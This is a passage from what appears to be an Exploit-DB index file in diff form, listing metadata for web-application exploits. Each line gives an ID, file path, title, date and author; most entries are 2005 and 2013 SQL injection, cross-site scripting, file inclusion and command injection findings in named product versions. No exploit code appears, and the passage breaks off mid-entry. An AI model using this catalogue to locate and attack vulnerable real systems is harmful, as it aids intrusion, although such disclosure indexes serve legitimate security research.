-25178,exploits/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps, -25179,exploits/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - 'DelPM.php' Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps, -25180,exploits/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - 'auth.php' Remote File Inclusion",2005-03-01,mozako,php,webapps, -25197,exploits/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps, -25198,exploits/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps, -25199,exploits/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting",2005-03-08,trueend5,php,webapps, -25200,exploits/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,php,webapps, -25201,exploits/cgi/webapps/25201.txt,"Newsscript - Access Validation",2005-03-08,adrianc23@gmail.com,cgi,webapps, -25206,exploits/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps, -25208,exploits/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - 'adm-photo.php' Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps, -25212,exploits/php/webapps/25212.txt,"UBBCentral UBB.Threads 6.0 - 'editpost.php' SQL Injection",2005-03-11,"ADZ Security Team",php,webapps, -25213,exploits/php/webapps/25213.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'viewall.php?start' SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps, -25214,exploits/php/webapps/25214.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'category.php?start' SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps, -25215,exploits/php/webapps/25215.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'viewall.php?start' Cross-Site Scripting",2005-03-12,sp3x@securityreason.com,php,webapps, -25216,exploits/php/webapps/25216.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'category.php?start' Cross-Site Scripting",2005-03-12,sp3x@securityreason.com,php,webapps, -25217,exploits/php/webapps/25217.html,"HolaCMS 1.2/1.4.x Voting Module - Remote File Corruption",2005-03-12,"Virginity Security",php,webapps, -25220,exploits/php/webapps/25220.txt,"PABox 2.0 - Post Icon HTML Injection",2005-03-14,Rift_XT,php,webapps, -25222,exploits/php/webapps/25222.html,"HolaCMS 1.2.x/1.4.x Voting Module - Directory Traversal Remote File Corruption",2005-03-13,"Virginity Security",php,webapps, -25223,exploits/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps, -25224,exploits/php/webapps/25224.txt,"SimpGB 1.0 - 'Guestbook.php' SQL Injection",2005-03-14,visus,php,webapps, -25225,exploits/php/webapps/25225.txt,"PHPAdsNew 2.0.4 - 'AdFrame.php' Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps, -25226,exploits/php/webapps/25226.txt,"VoteBox 2.0 - 'Votebox.php' Remote File Inclusion",2005-03-14,SmOk3,php,webapps, -25227,exploits/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php?phpbb_root_path' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps, -25228,exploits/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps, -25229,exploits/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - 'ENGLISH_poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps, -25230,exploits/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps, -25232,exploits/php/webapps/25232.txt,"McNews 1.x - 'install.php' Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps, -25233,exploits/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 - 'search.asp' Cross-Site Scripting",2005-03-17,"farhad koosha",asp,webapps, -25235,exploits/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection",2005-03-18,"GHC team",php,webapps, -25236,exploits/php/webapps/25236.html,"PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities",2005-03-18,"PersianHacker Team",php,webapps, -25237,exploits/php/webapps/25237.txt,"RunCMS 1.1 - Database Configuration Information Disclosure",2005-03-18,"Majid NT",php,webapps, -25239,exploits/php/webapps/25239.txt,"CoolForum 0.5/0.7/0.8 - 'avatar.php?img' Cross-Site Scripting",2005-03-19,Romano,php,webapps, -25240,exploits/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 - 'register.php?login' SQL Injection",2005-03-19,Romano,php,webapps, -25241,exploits/php/webapps/25241.html,"PHP-Fusion 4/5 - 'Setuser.php' HTML Injection",2005-03-19,"PersianHacker Team",php,webapps, -25242,exploits/php/webapps/25242.txt,"Ciamos 0.9.2 - 'Highlight.php' File Disclosure",2005-03-19,"Majid NT",php,webapps, -40397,exploits/aspx/webapps/40397.txt,"MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities",2016-09-19,"Paul Baade & Sven Krewitt",aspx,webapps, -25243,exploits/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps, -25244,exploits/php/webapps/25244.txt,"CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion",2005-03-21,brOmstar,php,webapps, -25245,exploits/php/webapps/25245.txt,"Social Site Generator 2.2 - Cross-Site Request Forgery (Add Admin)",2013-05-06,Fallaga,php,webapps, -25247,exploits/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps, -25248,exploits/php/webapps/25248.txt,"Joomla! Component dj-classifieds 2.0 - Blind SQL Injection",2013-05-06,Napsterakos,php,webapps, -25249,exploits/php/webapps/25249.txt,"WeBid 1.0.6 - Multiple Vulnerabilities",2013-05-06,"Ahmed Aboul-Ela",php,webapps, -25250,exploits/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting",2013-05-06,drone,php,webapps, -25251,exploits/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps, -25252,exploits/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps, -25253,exploits/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - 'upload.asp' Unauthenticated Arbitrary File Upload",2005-03-21,"farhad koosha",asp,webapps, -25254,exploits/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - 'myFiles.asp' Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps, -25257,exploits/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-22,"James Bercegay",php,webapps, -25258,exploits/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps, -25260,exploits/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php?act' Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps, -25261,exploits/php/webapps/25261.txt,"Vortex Portal 2.0 - 'content.php?act' Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps, -25262,exploits/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps, -25263,exploits/php/webapps/25263.txt,"DigitalHive 2.0 - 'msg.php' Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps, -25264,exploits/php/webapps/25264.txt,"DigitalHive 2.0 - 'membres.php?mt' Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps, -25265,exploits/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'sensor_program' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps, -25266,exploits/php/webapps/25266.txt,"PHPSysInfo 2.0/2.3 - 'system_footer.php' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps, -25267,exploits/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 - HTML Injection",2005-03-23,"Woody Hughes",php,webapps, -25269,exploits/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps, -25270,exploits/php/webapps/25270.txt,"Topic Calendar 1.0.1 - 'Calendar_Scheduler.php' Cross-Site Scripting",2004-03-24,"Alberto Trivero",php,webapps, -25271,exploits/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 - 'main.php' Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",php,webapps, -25272,exploits/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Cross-Site Scripting",2005-03-24,mircia,php,webapps, -25273,exploits/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' SQL Injection",2005-03-24,mircia,php,webapps, -25276,exploits/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 - 'review.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-25,mircia,php,webapps, -25278,exploits/php/webapps/25278.sh,"ESMI PayPal StoreFront 1.7 - 'pages.php?idpages' SQL Injection",2005-03-26,Dcrab,php,webapps, -25279,exploits/php/webapps/25279.txt,"ESMI PayPal StoreFront 1.7 - 'products1.php?id2' SQL Injection",2005-03-26,Dcrab,php,webapps, -25280,exploits/php/webapps/25280.txt,"ESMI PayPal StoreFront 1.7 - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps, -25282,exploits/php/webapps/25282.txt,"Nuke BookMarks 0.6 - 'Marks.php' Full Path Disclosure",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps, -25283,exploits/php/webapps/25283.txt,"Nuke BookMarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps, -25284,exploits/php/webapps/25284.txt,"Nuke BookMarks 0.6 - 'Marks.php' SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps, -25285,exploits/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps, -25286,exploits/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Remote File Inclusion",2005-03-26,Dcrab,php,webapps, -25292,exploits/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps, -25298,exploits/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80 -25299,exploits/php/webapps/25299.txt,"Tkai's Shoutbox - 'Query' Open Redirection",2005-03-28,CorryL,php,webapps, -25300,exploits/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps, -25301,exploits/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps, -25302,exploits/php/webapps/25302.txt,"PHPCOIN 1.2 - 'auxpage.php?page' Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps, -25304,exploits/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps, -25305,exploits/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps, -33406,exploits/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps, -33407,exploits/php/webapps/33407.txt,"Horde 3.3.5 - '/Administration Interface admin/cmdshell.php?PATH_INFO' Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps, -33408,exploits/php/webapps/33408.txt,"Horde 3.3.5 - '/Administration Interface admin/sqlshell.php?PATH_INFO' Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps, -25308,exploits/php/webapps/25308.txt,"PhotoPost Pro 5.1 - 'showgallery.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps, -25309,exploits/php/webapps/25309.txt,"PhotoPost Pro 5.1 - 'showmembers.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps, -25310,exploits/php/webapps/25310.txt,"PhotoPost Pro 5.1 - 'Slideshow.php?photo' Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps, -25311,exploits/php/webapps/25311.txt,"PhotoPost Pro 5.1 - 'showmembers.php?sl' SQL Injection",2005-03-28,"Diabolic Crab",php,webapps, -25312,exploits/php/webapps/25312.txt,"PhotoPost Pro 5.1 - 'showphoto.php?photo' SQL Injection",2005-03-28,"Diabolic Crab",php,webapps, -25313,exploits/asp/webapps/25313.txt,"ACS Blog 0.8/0.9/1.0/1.1 - 'Name' HTML Injection",2005-03-28,"Dan Crowley",asp,webapps, -25314,exploits/php/webapps/25314.txt,"The Includer 1.0/1.1 - Remote File Inclusion",2005-03-29,"hoang yen",php,webapps, -25315,exploits/php/webapps/25315.html,"Chatness 2.5 - 'Message Form' HTML Injection",2005-03-29,3nitro,php,webapps, -25316,exploits/php/webapps/25316.txt,"CPG Dragonfly 9.0.2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-29,mircia,php,webapps, -25317,exploits/php/webapps/25317.txt,"UApplication Ublog 1.0.x - Cross-Site Scripting",2005-03-29,"PersianHacker Team",php,webapps, -25318,exploits/asp/webapps/25318.txt,"Iatek IntranetApp 2.3 - 'ad_click.asp?banner_id' SQL Injection",2005-03-29,"Diabolic Crab",asp,webapps, -25320,exploits/php/webapps/25320.txt,"Lighthouse Development Squirrelcart 1.5.5 - SQL Injection",2005-03-29,"Diabolic Crab",php,webapps, -25323,exploits/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,php,webapps, -25324,exploits/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 - IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps, -25327,exploits/php/webapps/25327.txt,"Alstrasoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,php,webapps, -25328,exploits/php/webapps/25328.txt,"Alstrasoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps, -25330,exploits/php/webapps/25330.txt,"phpMyAdmin 2.x - Convcharset Cross-Site Scripting",2005-04-03,"Oriol Torrent Santiago",php,webapps, -25331,exploits/cgi/webapps/25331.txt,"SonicWALL SOHO 5.1.7 - Web Interface Multiple Remote Input Validation Vulnerabilities",2005-04-04,"Oliver Karow",cgi,webapps, -25332,exploits/asp/webapps/25332.txt,"SiteEnable - SQL Injection",2005-04-02,Zinho,asp,webapps, -40396,exploits/php/webapps/40396.txt,"MyBB 1.8.6 - SQL Injection",2016-09-19,"Curesec Research Team",php,webapps,80 -25337,exploits/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 - 'Usrdetails.php' Cross-Site Scripting",2005-04-05,"Diabolic Crab",php,webapps, -25338,exploits/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal",2005-04-05,"Diabolic Crab",php,webapps, -25339,exploits/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x Your_Account Module - 'Username' Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps, -25340,exploits/php/webapps/25340.txt,"PHP-Nuke 6.x/7.x Your_Account Module - Avatarcategory Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps, -25341,exploits/php/webapps/25341.html,"PHP-Nuke 6.x/7.x 'Downloads' Module - 'Lid' Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps, -25342,exploits/php/webapps/25342.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,"Maksymilian Arciemowicz",php,webapps, -25343,exploits/php/webapps/25343.txt,"PHP-Nuke 7.6 - 'banners.php' Cross-Site Scripting",2005-04-06,"Maksymilian Arciemowicz",php,webapps, -25344,exploits/php/webapps/25344.txt,"phpBB 2.0.13 DLMan Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps, -25345,exploits/php/webapps/25345.txt,"phpBB 2.0.13 Linkz Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps, -25346,exploits/asp/webapps/25346.txt,"Active Auction House - 'default.asp' Multiple SQL Injections",2005-04-06,Dcrab,asp,webapps, -25347,exploits/asp/webapps/25347.txt,"Active Auction House - 'ItemInfo.asp' SQL Injection",2005-04-06,Dcrab,asp,webapps, -25348,exploits/asp/webapps/25348.txt,"Active Auction House - 'start.asp?ReturnURL' Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps, -25349,exploits/asp/webapps/25349.txt,"Active Auction House - 'account.asp?ReturnURL' Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps, -25350,exploits/cgi/webapps/25350.txt,"WebWasher CSM 4.4.1 Build 752 Conf Script - Cross-Site Scripting",2005-04-06,"Oliver Karow",cgi,webapps, -25351,exploits/asp/webapps/25351.txt,"Active Auction House - 'sendpassword.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,Dcrab,asp,webapps, -25352,exploits/asp/webapps/25352.txt,"Active Auction House - 'WatchThisItem.asp' Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps, -25354,exploits/php/webapps/25354.txt,"Ocean12 Membership Manager Pro - Cross-Site Scripting",2005-04-06,Zinho,php,webapps, -25355,exploits/php/webapps/25355.txt,"CubeCart 2.0.x - 'index.php' Multiple Full Path Disclosures",2005-04-06,"John Cobb",php,webapps, -25356,exploits/php/webapps/25356.txt,"CubeCart 2.0.x - 'tellafriend.php?product' Full Path Disclosure",2005-04-06,"John Cobb",php,webapps, -25357,exploits/php/webapps/25357.txt,"CubeCart 2.0.x - 'view_cart.php?add' Full Path Disclosure",2005-04-06,"John Cobb",php,webapps, -25358,exploits/php/webapps/25358.txt,"CubeCart 2.0.x - 'view_product.php?product' Full Path Disclosure",2005-04-06,"John Cobb",php,webapps, -25360,exploits/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple SQL Injections",2005-04-07,"Maksymilian Arciemowicz",php,webapps, -25366,exploits/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - 'OP' Cross-Site Scripting",2005-04-08,Dcrab,php,webapps, -25367,exploits/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 - 'Module' Cross-Site Scripting",2005-04-08,Dcrab,php,webapps, -25368,exploits/php/webapps/25368.txt,"PostNuke Phoenix 0.760 RC3 - 'SID' SQL Injection",2005-04-08,Dcrab,php,webapps, -25369,exploits/php/webapps/25369.txt,"RadScripts RadBids Gold 2.0 - 'index.php?read' Traversal Arbitrary File Access",2005-04-09,Dcrab,php,webapps, -25370,exploits/php/webapps/25370.txt,"RadScripts RadBids Gold 2.0 - 'index.php?mode' SQL Injection",2005-04-09,Dcrab,php,webapps, -25371,exploits/php/webapps/25371.txt,"RadScripts RadBids Gold 2.0 - 'faq.php?farea' Cross-Site Scripting",2005-04-09,Dcrab,php,webapps, -25372,exploits/php/webapps/25372.txt,"RadScripts RadBids Gold 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-09,Dcrab,php,webapps, -25373,exploits/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' Cross-Site Scripting",2005-04-09,kre0n,php,webapps, -25374,exploits/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' SQL Injection",2005-04-09,kre0n,php,webapps, -25376,exploits/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion",2005-04-10,"James Bercegay",php,webapps, -25377,exploits/php/webapps/25377.txt,"ModernGigabyte ModernBill 4.3 - 'C_CODE' Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps, -25378,exploits/php/webapps/25378.txt,"ModernGigabyte ModernBill 4.3 - 'Aid' Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps, -25379,exploits/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 - 'index.php' SQL Injection",2005-04-11,"Andreas Constantinides",php,webapps, -25380,exploits/php/webapps/25380.txt,"Invision Power Board 1.x - 'ST' SQL Injection",2005-04-11,Dcrab,php,webapps, -25381,exploits/php/webapps/25381.txt,"WebCT Discussion Board 4.1 - HTML Injection",2005-04-11,lacertosum,php,webapps, -25382,exploits/php/webapps/25382.txt,"jPORTAL 2.3.1 - 'Banner.php' SQL Injection",2005-04-11,CiNU5,php,webapps, -25390,exploits/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 - 'Comersus_Search_Item.asp' Cross-Site Scripting",2005-04-12,Lostmon,asp,webapps, -25394,exploits/php/webapps/25394.txt,"Pinnacle Cart - 'index.php' Cross-Site Scripting",2005-04-12,SmOk3,php,webapps, -25398,exploits/php/webapps/25398.txt,"PHPBB2 Plus 1.5 - 'GroupCP.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps, -25399,exploits/php/webapps/25399.txt,"PHPBB2 Plus 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps, -25400,exploits/php/webapps/25400.txt,"PHPBB2 Plus 1.5 - 'Portal.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps, -25401,exploits/php/webapps/25401.txt,"PHPBB2 Plus 1.5 - 'viewtopic.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps, -25403,exploits/php/webapps/25403.txt,"phpBB Photo Album 2.0.53 Module - 'Album_Cat.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps, -25404,exploits/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - 'Album_Comment.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps, -25405,exploits/php/webapps/25405.txt,"Getsimple CMS 3.2.1 - Arbitrary File Upload",2013-05-13,"Ahmed Elhady Mohamed",php,webapps, -25409,exploits/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities",2013-05-13,AtT4CKxT3rR0r1ST,php,webapps, -25410,exploits/php/webapps/25410.txt,"Joomla! Component com_s5clanroster - 'id' SQL Injection",2013-05-13,AtT4CKxT3rR0r1ST,php,webapps, -25412,exploits/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps, -25413,exploits/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1/1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps, -25414,exploits/ios/webapps/25414.txt,"Wifi Album 1.47 iOS - Command Injection",2013-05-13,Vulnerability-Lab,ios,webapps, -25415,exploits/ios/webapps/25415.txt,"Wireless Photo Access 1.0.10 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps, -25416,exploits/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,hardware,webapps, -25417,exploits/ios/webapps/25417.txt,"File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps, -25422,exploits/php/webapps/25422.txt,"All4WWW-HomePageCreator 1.0 - 'index.php' Remote File Inclusion",2005-04-14,"Francisco Alisson",php,webapps, -25423,exploits/php/webapps/25423.txt,"SPHPBlog 0.4 - 'search.php' Cross-Site Scripting",2005-04-14,y3dips,php,webapps, -25424,exploits/asp/webapps/25424.txt,"OneWorldStore - 'OWAddItem.asp' SQL Injection",2005-04-14,Dcrab,asp,webapps, -25425,exploits/asp/webapps/25425.txt,"OneWorldStore - 'OWListProduct.asp' Multiple SQL Injections",2005-04-14,Dcrab,asp,webapps, -25426,exploits/asp/webapps/25426.txt,"OneWorldStore - 'OWProductDetail.asp' SQL Injection",2005-04-14,Dcrab,asp,webapps, -25427,exploits/asp/webapps/25427.txt,"OneWorldStore - 'OWContactUs.asp' Cross-Site Scripting",2005-04-14,Dcrab,asp,webapps, -25428,exploits/asp/webapps/25428.txt,"OneWorldStore - 'OWListProduct.asp' Cross-Site Scripting",2005-04-14,Dcrab,asp,webapps, -25430,exploits/php/webapps/25430.txt,"PHP-Nuke 7.6 Surveys Module - HTTP Response Splitting",2005-04-15,Dcrab,php,webapps, -25431,exploits/php/webapps/25431.pl,"Ariadne CMS 2.4 - Remote File Inclusion",2006-10-19,"Fidel Costa",php,webapps, -25432,exploits/php/webapps/25432.txt,"phpBB Remote - 'mod.php' SQL Injection",2005-04-16,"tom cruise",php,webapps, -25433,exploits/php/webapps/25433.txt,"Datenbank Module For phpBB - 'Remote mod.php' Cross-Site Scripting",2005-04-16,"tom cruise",php,webapps, -25434,exploits/php/webapps/25434.txt,"eGroupWare 1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-18,"GulfTech Security",php,webapps, -25435,exploits/php/webapps/25435.txt,"eGroupWare 1.0 - '/sitemgr-site/index.php?category_id' Cross-Site Scripting",2005-04-18,"GulfTech Security",php,webapps, -25436,exploits/php/webapps/25436.txt,"eGroupWare 1.0 - '/tts/index.php?filter' SQL Injection",2005-04-18,"GulfTech Security",php,webapps, -25437,exploits/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php?cats_app' SQL Injection",2005-04-18,"GulfTech Security",php,webapps, -25438,exploits/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",php,webapps, -25440,exploits/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,php,webapps, -25441,exploits/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps, -25442,exploits/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php?id' SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps, -25447,exploits/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps, -25449,exploits/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps, -25451,exploits/php/webapps/25451.txt,"phpBB 1.x/2.0.x - Knowledge Base Module 'KB.php' SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps, -25455,exploits/asp/webapps/25455.txt,"OneWorldStore - 'DisplayResults.asp' SQL Injection",2005-04-19,Lostmon,asp,webapps, -25456,exploits/asp/webapps/25456.txt,"OneWorldStore - 'DisplayResults.asp' Cross-Site Scripting",2005-04-19,Lostmon,asp,webapps, -25457,exploits/php/webapps/25457.c,"UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection",2005-03-11,HLL,php,webapps, -25458,exploits/php/webapps/25458.txt,"CityPost PHP LNKX 52.0 - 'message.php' Cross-Site Scripting",2005-04-19,Thom,php,webapps, -25459,exploits/php/webapps/25459.txt,"CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - 'URI' Cross-Site Scripting",2005-04-19,Thom,php,webapps, -25464,exploits/php/webapps/25464.txt,"CityPost Simple PHP Upload - 'Simple-upload-53.php' Cross-Site Scripting",2005-04-19,Thom,php,webapps, -25466,exploits/asp/webapps/25466.txt,"ECommPro 3.0 - 'Admin/login.asp' SQL Injection",2005-04-20,c0d3r,asp,webapps, -25467,exploits/php/webapps/25467.txt,"Netref 4.2 - 'Cat_for_gen.php' Remote PHP Script Injection",2005-04-20,jaguar,php,webapps, -25468,exploits/php/webapps/25468.txt,"PHP Labs - '.proFile' Dir URI Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps, -25469,exploits/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 - Admin Form SQL Injection",2005-04-20,Zinho,php,webapps, -25473,exploits/php/webapps/25473.txt,"PHP Labs - '.proFile' File URI Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps, -25474,exploits/php/webapps/25474.txt,"phpBB-Auction Module 1.0/1.2 - 'Auction_Rating.php' SQL Injection",2005-04-20,sNKenjoi,php,webapps, -25475,exploits/php/webapps/25475.txt,"phpBB-Auction Module 1.0/1.2 - 'Auction_Offer.php' SQL Injection",2005-04-20,sNKenjoi,php,webapps, -25476,exploits/asp/webapps/25476.txt,"DUportal Pro 3.4 - 'default.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps, -25477,exploits/asp/webapps/25477.txt,"DUportal Pro 3.4 - 'search.asp?iChannel' SQL Injection",2005-04-20,Dcrab,asp,webapps, -25478,exploits/asp/webapps/25478.txt,"DUportal Pro 3.4 - 'inc_vote.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps, -25479,exploits/asp/webapps/25479.txt,"DUportal Pro 3.4 - 'result.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps, -25480,exploits/asp/webapps/25480.txt,"DUportal Pro 3.4 - 'cat.asp' 